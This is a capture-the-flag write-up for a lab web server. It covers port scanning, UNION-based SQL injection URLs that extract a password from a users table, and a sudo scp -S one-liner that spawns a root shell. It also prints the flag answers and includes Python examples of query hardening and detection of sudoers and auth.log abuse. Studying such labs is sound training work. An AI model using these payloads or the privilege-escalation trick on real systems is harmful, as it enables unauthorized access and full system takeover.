Port scanning

sudo nmap --min-rate 10000 -p- 10.10.234.139  
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-04 20:13 CST
Nmap scan report for 10.10.234.139 (10.10.234.139)
Host is up (0.28s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 park.thm   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-04 20:14 CST
Nmap scan report for park.thm (10.10.234.139)
Host is up (0.27s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:1f:56:bc:66:b1:c7:d1:e9:89:ba:7e:ef:69:68:f3 (RSA)
| 256 30:28:fc:e1:97:7b:47:ab:8b:dd:84:c5:34:76:16:77 (ECDSA)
|_ 256 5a:92:54:50:f5:04:a7:36:a1:d1:b4:32:ee:2b:e5:7c (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Jarassic Park
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.4 (96%), Linux 3.10 - 3.13 (96%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Sony Android TV (Android 5.0) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.83 seconds

While that runs, a directory scan goes on in the background.

Web

http://park.thm/item.php?id=1

The page takes its parameter via GET. Entering a quote appears to be filtered, but a plain union select goes straight through; trial and error shows the query has 5 columns.

http://park.thm/item.php?id=5%20union%20select%201,database(),3,4,5

The database is named park.

http://park.thm/item.php?id=5%20union%20select%201,version(),3,4,5

The system version is Ubuntu 16.04.

http://park.thm/item.php?id=5%20union%20select%201,group_concat(table_name),3,4,5%20FROM%20information_schema.tables%20WHERE%20table_schema%20=database()

Result: there are 2 tables, items and users.

http://park.thm/item.php?id=5%20union%20select%201,group_concat(column_name),3,4,5%20FROM%20information_schema.columns%20WHERE%20table_schema%20=database()%20and%20table_name%20=%20%22users%22

That gives three columns: id, username, password.

Trying to dump these three columns lands on the blacklist page again; after a few attempts it turns out the word username is what gets filtered.

http://park.thm/item.php?id=5%20union%20select%201,id,0x3a,password,5%20FROM%20users

So only the password can be retrieved: ih8dinos

But the room's task already tells us the username is dennis.

It turns out to be the SSH password, and the login succeeds.
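As an added illustration (not code from this writeup or from the room; the real item.php is PHP/MySQL and its source is not on the page), here is a Python/sqlite3 model of the item lookup. It puts the deny-list-plus-concatenation pattern described above next to the hardened form that validates the value's shape and binds it as a parameter. The schema, the sample rows and the blacklist contents are constructed.

```python
import re
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the 'park' database the writeup
    enumerated: an items table with five columns and a users table with
    id, username, password. All row values are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items(id INTEGER, name TEXT, description TEXT, price TEXT, image TEXT);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO items VALUES (1, 'Ticket', 'Park entry', '10', 'ticket.png');
        INSERT INTO users VALUES (1, 'demo_user', 'demo_password_NOT_REAL');
    """)
    return conn


# A guess at the deny-list the writeup ran into: quotes and the word
# "username" are rejected, everything else is passed straight into the query.
BLACKLIST = ("'", '"', "username")


def lookup_item_vulnerable(conn, raw_id):
    """Deny-list followed by string concatenation. The id sits in a numeric
    context, so a UNION payload never needs a quote and is never caught;
    only the literal word 'username' trips the filter, which is exactly why
    the writeup could read password but not username."""
    lowered = raw_id.lower()
    if any(bad in lowered for bad in BLACKLIST):
        return "blacklisted"
    sql = "SELECT id, name, description, price, image FROM items WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_item_safe(conn, raw_id):
    """Hardened form: allow-list the shape of the value (digits only) and
    bind it as a parameter, so the input can never alter the query text."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return "rejected"
    sql = "SELECT id, name, description, price, image FROM items WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    # Same shape as the writeup's payload: no quote in it, so the deny-list
    # has nothing to match on.
    payload = "5 union select 1,password,3,4,5 from users"
    print("vulnerable:", lookup_item_vulnerable(db, payload))
    print("hardened:  ", lookup_item_safe(db, payload))
    print("hardened, honest request:", lookup_item_safe(db, "1"))
```

The point of the two functions side by side is the one the writeup makes at the end: filtering characters is not a defence for a parameter that is interpolated into SQL. A type check plus a bound parameter removes the problem regardless of what the input contains.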

flag1

b89f2d69c56b9981ac92dd267f

Privilege escalation

It turns out we have sudo privileges for scp??

Straight away:

TF=$(mktemp)                  # temporary file that will stand in for the ssh program
echo 'sh 0<&2 1>&2' > "$TF"   # it just starts a shell on the current terminal
chmod +x "$TF"
sudo scp -S "$TF" x y:        # -S makes scp run $TF for the transport; under sudo that runs as root

And we are already root??
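Added example, not part of the original writeup: a small Python audit for the sudo side of this. It flags sudoers rules that let a non-root user run scp, and scans sudo's auth.log entries for scp invocations that override the transport program with -S, so the exact step above would show up in a log review. The sudoers excerpt and the log lines are constructed; the real rule on the box is not shown on the page, so its shape is an assumption.

```python
import re
import shlex

# Constructed sudoers excerpt. The writeup only says dennis could run scp
# through sudo; the exact rule is not on the page, so this is a guess.
SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
dennis  ALL=(ALL) NOPASSWD: /usr/bin/scp
"""

# Constructed auth.log lines in the layout sudo uses on Ubuntu. The first is
# a plain file copy, the second overrides the ssh program with -S.
AUTH_LOG = [
    "Oct  4 20:20:01 park sudo:   dennis : TTY=pts/0 ; PWD=/home/dennis ; "
    "USER=root ; COMMAND=/usr/bin/scp notes.txt backup:/srv/",
    "Oct  4 20:21:44 park sudo:   dennis : TTY=pts/0 ; PWD=/home/dennis ; "
    "USER=root ; COMMAND=/usr/bin/scp -S /tmp/tmp.Kq3lZ x y:",
]

# user  host=(runas) [TAG:]... command[, command]...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text):
    """Return (user, runas, command) for every non-root rule granting scp.
    scp is not safe to hand out via sudo: its -S option lets the caller
    choose the program used for the ssh transport, so a rule meant to allow
    file copies allows arbitrary commands as the run-as user."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m or m.group("user") == "root":
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            binary = cmd.split()[0]
            if binary == "scp" or binary.endswith("/scp"):
                findings.append((m.group("user"), m.group("runas"), cmd))
    return findings


SUDO_LOG_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)


def find_scp_program_override(lines):
    """Return (user, runas, program) for sudo log entries where scp was run
    with -S. Only the standalone -S form is handled here; a production rule
    would also need to cover combined short options."""
    hits = []
    for line in lines:
        m = SUDO_LOG_RE.search(line)
        if not m:
            continue
        argv = shlex.split(m.group("cmd"))
        if not argv or not (argv[0] == "scp" or argv[0].endswith("/scp")):
            continue
        if "-S" in argv[1:]:
            idx = argv.index("-S")
            program = argv[idx + 1] if idx + 1 < len(argv) else ""
            hits.append((m.group("user"), m.group("runas"), program))
    return hits


if __name__ == "__main__":
    for finding in audit_sudoers(SUDOERS):
        print("risky sudoers rule:", finding)
    for hit in find_scp_program_override(AUTH_LOG):
        print("scp -S via sudo:", hit)
```

The sudoers check is the preventive half (the rule should simply not exist; if root-level file copies are needed, a dedicated service account or a restricted copy mechanism is the usual answer), and the log check is the detective half for boxes where such a rule is already in place.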

find / -name "flag*"

That turns up the remaining flags directly.

flag2

96ccd6b429be8c9a4b501c7a0b117b0a

flag3 (of all places, it is in dennis's .bash_history...)

b4973bbc9053807856ec815db25fb3f1

flag5

2a7074e491fcacc7eeba97808dc5e2ec

Afterthoughts

Honestly, a very disappointing box... It is rated HARD, but the SQL injection filtering is as good as no filtering at all. Privilege escalation is a one-liner, and the flag placements are meaningless. A bit of a waste of time.